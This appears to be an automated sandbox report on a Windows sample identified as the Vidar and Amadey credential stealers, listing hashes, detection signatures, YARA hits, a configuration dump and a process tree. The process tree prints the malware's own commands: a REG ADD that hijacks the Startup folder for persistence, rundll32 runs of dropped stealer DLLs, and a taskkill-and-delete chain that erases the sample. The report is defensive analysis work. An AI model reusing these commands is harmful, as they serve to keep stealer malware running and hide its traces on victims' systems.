Analysis Report wKYTg7Gp6P.exe

Overview

General Information

Sample Name: wKYTg7Gp6P.exe
Analysis ID: 399582
MD5: c4c7d74ca7c0fc1511a82b040a274549
SHA1: b0b1f42d887a07d4bfae6b1e63900bad822b0908
SHA256: 84343112791c187d10af9cea8fac68cf4fc03d72352f1fe2def0bf72f9a9afc7
Tags: ArkeiStealer, exe

Detection

Amadey Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey bot
Yara detected Amadey's stealer DLL
Yara detected Vidar stealer
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Creates files in alternative data streams (ADS)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Posts data to a JPG file (protocol mismatch)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Startup

  • System is w10x64
  • wKYTg7Gp6P.exe (PID: 6924 cmdline: 'C:\Users\user\Desktop\wKYTg7Gp6P.exe' MD5: C4C7D74CA7C0FC1511A82B040A274549)
    • M7WCJ84VE5TXJ0R4.exe (PID: 6780 cmdline: 'C:\ProgramData\M7WCJ84VE5TXJ0R4.exe' MD5: 31AB82365078548DCEA62DA7C2380B2E)
      • blfte.exe (PID: 5756 cmdline: 'C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe' MD5: 31AB82365078548DCEA62DA7C2380B2E)
        • cmd.exe (PID: 6796 cmdline: 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • reg.exe (PID: 6828 cmdline: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\ MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • rundll32.exe (PID: 6248 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\cred.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 1380 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\scr.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • cmd.exe (PID: 5732 cmdline: 'C:\Windows\System32\cmd.exe' /c taskkill /im wKYTg7Gp6P.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\wKYTg7Gp6P.exe' & del C:\ProgramData\*.dll & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • taskkill.exe (PID: 6068 cmdline: taskkill /im wKYTg7Gp6P.exe /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • timeout.exe (PID: 5724 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: Vidar

{"Config: ": ["00000000 -> Version: 38.6", "Date: Wed Apr 28 22:58:45 2021", "MachineID: d06ed635-68f6-4e9a-955c-4899f5f57b9a", "GUID: {e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}", "HWID: d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963", "Path: C:\\Users\\user\\Desktop\\wKYTg7Gp6P.exe", "Work Dir: C:\\ProgramData\\CU50S1CYVL0A4WGXHOO1KFZGQ", "Windows: Windows 10 Pro [x64]", "Computer Name: 019635", "User Name: user", "Display Resolution: 1280x1024", "Display Language: en-US", "Keyboard Languages: English (United States)", "Local Time: 28/4/2021 22:58:45", "TimeZone: UTC1", "[Hardware]", "Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "CPU Count: 4", "RAM: 8191 MB", "VideoCard: Microsoft Basic Display Adapter", "[Processes]", "---------- System [4]", "------------------------------  Registry [88]", "-  smss.exe [300]", "-  csrss.exe [400]", "-  wininit.exe [476]", "-  csrss.exe [488]", "-  services.exe [568]", "-  winlogon.exe [576]", "-  lsass.exe [592]", "-  fontdrvhost.exe [692]", "-  svchost.exe [712]", "-  fontdrvhost.exe [724]", "-  svchost.exe [800]", "-  svchost.exe [848]", "-  svchost.exe [888]", "-  dwm.exe [988]", "-  svchost.exe [340]", "-  svchost.exe [420]", "-  svchost.exe [396]", "-  svchost.exe [968]", "-  svchost.exe [1040]", "-  svchost.exe [1104]", "-  svchost.exe [1180]", "-  svchost.exe [1272]", "-  svchost.exe [1328]", "-  svchost.exe [1336]", "-  svchost.exe [1348]", "-  Memory Compression [1408]", "-  svchost.exe [1432]", "-  svchost.exe [1464]", "-  svchost.exe [1480]", "-  svchost.exe [1524]", "-  svchost.exe [1560]", "-  svchost.exe [1632]", "-  svchost.exe [1652]", "-  svchost.exe [1672]", "-  svchost.exe [1720]", "-  svchost.exe [1728]", "-  svchost.exe [1816]", "-  svchost.exe [1824]", "-  spoolsv.exe [1888]", "-  svchost.exe [1944]", "-  svchost.exe [2036]", "-  svchost.exe [1252]", "-  svchost.exe [1308]", "-  svchost.exe [2080]", "-  svchost.exe [2116]", "-  svchost.exe [2124]", "-  svchost.exe [2132]", "-  svchost.exe [2144]", "-  
svchost.exe [2164]", "-  svchost.exe [2172]", "-  svchost.exe [2180]", "-  svchost.exe [2308]", "-  svchost.exe [2372]", "-  svchost.exe [2420]", "-  svchost.exe [2428]", "-  sihost.exe [3052]", "-  svchost.exe [2304]", "-  svchost.exe [2500]", "-  taskhostw.exe [3112]", "-  svchost.exe [3204]", "---------- ctfmon.exe [3284]", "-  explorer.exe [3424]", "-  smartscreen.exe [3516]", "-  svchost.exe [3676]", "-  dllhost.exe [3832]", "-  ShellExperienceHost.exe [4028]", "-  SearchUI.exe [3188]", "-  RuntimeBroker.exe [3656]", "-  RuntimeBroker.exe [4268]", "-  RuntimeBroker.exe [4772]", "-  WmiPrvSE.exe [5060]", "-  svchost.exe [4472]", "-  SgrmBroker.exe [4644]", "-  svchost.exe [4668]", "-  svchost.exe [3500]", "-  svchost.exe [4960]", "-  dllhost.exe [3564]", "-  ApplicationFrameHost.exe [4580]", "-  svchost.exe [160]", "-  audiodg.exe [2232]", "-  svchost.exe [2468]", "-  svchost.exe [4888]", "-  WMIADAP.exe [1620]", "-  WmiPrvSE.exe [500]", "-  WmiPrvSE.exe [2588]", "-  msiexec.exe [4184]", "-  svchost.exe [1504]", "-  svchost.exe [2856]", "-  svchost.exe [3408]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5176]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5204]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5216]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5232]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5240]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5252]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5260]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5268]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5276]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5288]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5296]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5304]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5316]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5324]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5332]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5344]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5352]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5360]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5376]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5384]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5392]", "-  svchost.exe [5664]", "-  wermgr.exe [5692]", "-  
conhost.exe [5940]", "-  MusNotifyIcon.exe [6060]", "-  svchost.exe [6088]", "-  svchost.exe [2480]", "-  RuntimeBroker.exe [1848]", "-  UsoClient.exe [4500]", "-  UsoClient.exe [5908]", "-  svchost.exe [616]", "-  backgroundTaskHost.exe [1056]", "-  HxTsr.exe [2800]", "-  svchost.exe [4180]", "-  RuntimeBroker.exe [4284]", "-  RuntimeBroker.exe [6208]", "-  wKYTg7Gp6P.exe [6924]", "-  backgroundTaskHost.exe [7020]", "-  BackgroundTransferHost.exe [7084]", "[Software]", "Google Chrome [85.0.4183.121]", "Microsoft Office Professional Plus 2016 [16.0.4266.1001]", "Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 [12.0.30501.0]", "Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 [12.0.21005]", "Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319 [10.0.30319]", "Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 [14.21.27702]", "Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 [14.21.27702]", "Java 8 Update 211 [8.0.2110.12]", "Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 [11.0.61030.0]", "Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 [14.21.27702.2]", "Java Auto Updater [2.8.211.12]", "Google Update Helper [1.3.35.451]", "Microsoft Office Professional Plus 2016 [16.0.4266.1001]", "Security Update for Microsoft Office 2016 (KB3114690) 32-Bit EditionUpdate for Microsoft Office 2016 (KB2920712) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3141456) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3115081) 32-Bit EditionUpdate for Microsoft Office 2016 (KB2920717) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3114852) 32-Bit EditionUpdate for Microsoft Office 2016 (KB2920720) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4022161) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB3128012) 32-Bit EditionSecurity Update for Microsoft Word 2016 (KB4484300) 32-Bit EditionSecurity Update for Microsoft PowerPoint 2016 (KB4484246) 32-Bit EditionUpdate for Microsoft 
Office 2016 (KB3118263) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4022176) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3114528) 32-Bit EditionSecurity Update for Microsoft Visio 2016 (KB4484244) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4484287) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3118262) 32-Bit EditionUpdate for Skype for Business 2016 (KB4484286) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4484214) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4011574) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3213650) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4462119) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4032236) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB3085538) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484138) 32-Bit EditionDefinition Update for Microsoft Office 2016 (KB3115407) 32-Bit EditionUpdate for Microsoft Office 2016 (KB2920678) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4475580) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484248) 32-Bit EditionSecurity Update for Microsoft Excel 2016 (KB4484273) 32-Bit EditionSecurity Update for Microsoft Publisher 2016 (KB4011097) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4464586) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4464538) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4461435) 32-Bit EditionSecurity Update for Microsoft Outlook 2016 (KB4484274) 32-Bit EditionSecurity Update for Microsoft Project 2016 (KB4484269) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3191929) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4011259) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4464535) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB2920727) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3114903) 32-Bit EditionUpdate for Microsoft Office 2016 (KB2920724) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484101) 32-Bit EditionUpdate for 
Microsoft Office 2016 (KB3118264) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4011629) 32-Bit EditionSecurity Update for Microsoft Access 2016 (KB4484167) 32-Bit EditionUpdate for Microsoft OneDrive for Business (KB4022219) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4032254) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4011225) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484106) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4022193) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4011634) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4484258) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3178666) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4011669) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4475588) 32-Bit EditionUpdate for Microsoft OneNote 2016 (KB4475586) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB3213551) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484145) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3115276) 32-Bit EditionMicrosoft Access MUI (English) 2016 [16.0.4266.1001]", "Microsoft Excel MUI (English) 2016 [16.0.4266.1001]", "Security Update for Microsoft Excel 2016 (KB4484273) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4011629) 32-Bit EditionMicrosoft PowerPoint MUI (English) 2016 [16.0.4266.1001]", "Security Update for Microsoft PowerPoint 2016 (KB4484246) 32-Bit EditionSecurity Update for Microsoft Excel 2016 (KB4484273) 32-Bit EditionMicrosoft Publisher MUI (English) 2016 [16.0.4266.1001]", "Security Update for Microsoft Publisher 2016 (KB4011097) 32-Bit EditionMicrosoft Outlook MUI (English) 2016 [16.0.4266.1001]", "Security Update for Microsoft Word 2016 (KB4484300) 32-Bit EditionSecurity Update for Microsoft Outlook 2016 (KB4484274) 32-Bit EditionMicrosoft Word MUI (English) 2016 [16.0.4266.1001]", "Security Update for Microsoft Word 2016 (KB4484300) 32-Bit EditionSecurity Update for Microsoft Excel 2016 (KB4484273) 32-Bit EditionMicrosoft Office 
Proofing Tools 2016 - English [16.0.4266.1001]", "Update for Microsoft Office 2016 (KB4464538) 32-Bit EditionOutils de v", "00002601 -> rification linguistique 2016 de Microsoft Office", "00002632 -> - Fran", "00002639 -> ais [16.0.4266.1001]", "Update for Microsoft Office 2016 (KB4464538) 32-Bit EditionHerramientas de correcci", "000026a3 -> n de Microsoft Office 2016: espa", "000026c4 -> ol [16.0.4266.1001]", "Update for Microsoft Office 2016 (KB4464538) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3114528) 32-Bit EditionUpdate for Skype for Business 2016 (KB4484286) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3213650) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4462119) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB3085538) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4022162) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484248) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4464586) 32-Bit EditionSecurity Update for Microsoft Project 2016 (KB4484269) 32-Bit EditionUpdate for Microsoft OneDrive for Business (KB4022219) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484106) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4011634) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4475588) 32-Bit EditionUpdate for Microsoft OneNote 2016 (KB4475586) 32-Bit EditionUpdate for Microsoft OneDrive for Business (KB4022219) 32-Bit EditionMicrosoft Office Proofing (English) 2016 [16.0.4266.1001]", "Microsoft InfoPath MUI (English) 2016 [16.0.4266.1001]", "Microsoft Office Shared MUI (English) 2016 [16.0.4266.1001]", "Security Update for Microsoft Office 2016 (KB4022176) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4484214) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4011574) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4475580) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484106) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB3213551) 32-Bit EditionMicrosoft DCF 
MUI (English) 2016 [16.0.4266.1001]", "Microsoft OneNote MUI (English) 2016 [16.0.4266.1001]", "Update for Microsoft OneNote 2016 (KB4475586) 32-Bit EditionMicrosoft Groove MUI (English) 2016 [16.0.4266.1001]", "Update for Microsoft OneDrive for Business (KB4022219) 32-Bit EditionMicrosoft Office OSM MUI (English) 2016 [16.0.4266.1001]", "Microsoft Office OSM UX MUI (English) 2016 [16.0.4266.1001]", "Microsoft Office Shared Setup Metadata MUI (English) 2016 [16.0.4266.1001]", "Microsoft Access Setup Metadata MUI (English) 2016 [16.0.4266.1001]", "Microsoft Skype for Business MUI (English) 2016 [16.0.4266.1001]", "Security Update for Microsoft Word 2016 (KB4484300) 32-Bit EditionUpdate for Skype for Business 2016 (KB4484286) 32-Bit EditionAdobe Refresh Manager [1.8.0]", "Adobe Acrobat Reader DC [19.012.20035]", "Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 [11.0.61030]", "Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 [11.0.61030]", "Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 [11.0.61030.0]", "Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.21.27702 [14.21.27702.2]", "Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 [12.0.30501.0]", "Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 [12.0.21005]"]}

Yara Overview

PCAP (Network Traffic)

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| dump.pcap | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security | |
| dump.pcap | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security | |

Dropped Files

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| C:\ProgramData\1a9f26b569d5df\cred.dll | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security | |
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred[1].dll | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security | |

Memory Dumps

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000000.00000003.659819807.0000000002250000.00000004.00000001.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmp | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security | |
| 00000000.00000002.700376910.0000000002180000.00000040.00000001.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| Process Memory Space: wKYTg7Gp6P.exe PID: 6924 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |

Unpacked PEs

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 0.2.wKYTg7Gp6P.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| 0.3.wKYTg7Gp6P.exe.2250000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| 0.3.wKYTg7Gp6P.exe.2250000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| 0.2.wKYTg7Gp6P.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| 0.2.wKYTg7Gp6P.exe.2180e50.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\ProgramData\1a9f26b569d5df\cred.dll | Avira: detection malicious, Label: HEUR/AGEN.1137247
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred[1].dll | Avira: detection malicious, Label: HEUR/AGEN.1137247
Source: C:\ProgramData\1a9f26b569d5df\scr.dll | Avira: detection malicious, Label: HEUR/AGEN.1136939
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\scr[1].dll | Avira: detection malicious, Label: HEUR/AGEN.1136939
Found malware configuration
Source: information.txt.0.dr.binstr | Malware Configuration Extractor: Vidar (configuration dump as listed under Malware Configuration)
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\1a9f26b569d5df\cred.dll | ReversingLabs: Detection: 82%
Source: C:\ProgramData\1a9f26b569d5df\scr.dll | ReversingLabs: Detection: 82%
Multi AV Scanner detection for submitted file
Source: wKYTg7Gp6P.exe | Virustotal: Detection: 48%
Source: wKYTg7Gp6P.exe | ReversingLabs: Detection: 58%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\xsrv2[1].exe | Joe Sandbox ML: detected
Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: wKYTg7Gp6P.exe | Joe Sandbox ML: detected
Source: 0.3.wKYTg7Gp6P.exe.2250000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.wKYTg7Gp6P.exe.2180e50.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe | Code function: 0_2_0040B708 CryptUnprotectData,LocalAlloc,_memmove,LocalFree,0_2_0040B708

                              Compliance:

                              barindex
                              Detected unpacking (overwrites its own PE header)Show sources
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeUnpacked PE file: 0.2.wKYTg7Gp6P.exe.400000.0.unpack
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeUnpacked PE file: 5.2.M7WCJ84VE5TXJ0R4.exe.400000.0.unpack
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeUnpacked PE file: 10.2.blfte.exe.400000.0.unpack
                              Source: wKYTg7Gp6P.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                              Source: unknownHTTPS traffic detected: 104.17.63.50:443 -> 192.168.2.4:49733 version: TLS 1.2
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3[1].dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.0.dr
                              Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
                              Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
                              Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: M7WCJ84VE5TXJ0R4.exe, blfte.exe
                              Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.0.dr
                              Source: Binary string: UC:\kinukuconuwukuwok24_motowubidanagosumozi_dibiciyixaho-pow.pdbpdb source: wKYTg7Gp6P.exe, 00000000.00000003.684695927.0000000002CA4000.00000004.00000001.sdmp, M7WCJ84VE5TXJ0R4.exe, 00000005.00000000.695429336.0000000000415000.00000002.00020000.sdmp, blfte.exe, 0000000A.00000000.708934344.0000000000415000.00000002.00020000.sdmp, blfte.exe.5.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3[1].dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.0.dr
                              Source: Binary string: C:\kinukuconuwukuwok24_motowubidanagosumozi_dibiciyixaho-pow.pdb source: wKYTg7Gp6P.exe, 00000000.00000003.684695927.0000000002CA4000.00000004.00000001.sdmp, M7WCJ84VE5TXJ0R4.exe, 00000005.00000000.695429336.0000000000415000.00000002.00020000.sdmp, blfte.exe, 0000000A.00000000.708934344.0000000000415000.00000002.00020000.sdmp, blfte.exe.5.dr
                              Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: wKYTg7Gp6P.exe, 00000000.00000003.666628269.0000000002F10000.00000004.00000001.sdmp, nss3.dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.0.dr
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Code function: 0_2_0040657E __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,0_2_0040657E
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Code function: 0_2_00404905 __EH_prolog3,_memset,_memset,_memset,_memset,lstrcpyW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,FindClose,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,FindClose,0_2_00404905
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Code function: 0_2_0045F3B6 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,0_2_0045F3B6
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Code function: 0_2_00405437 __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,0_2_00405437
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Code function: 0_2_0040F7AE _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,0_2_0040F7AE
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Code function: 0_2_0040F998 __EH_prolog3,__wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,0_2_0040F998
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe Code function: 5_2_00419F82 FindFirstFileExW,5_2_00419F82
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe Code function: 5_2_0211A1D2 FindFirstFileExW,5_2_0211A1D2
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Code function: 10_2_00419F82 FindFirstFileExW,10_2_00419F82
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Code function: 10_2_0223A1D2 FindFirstFileExW,10_2_0223A1D2
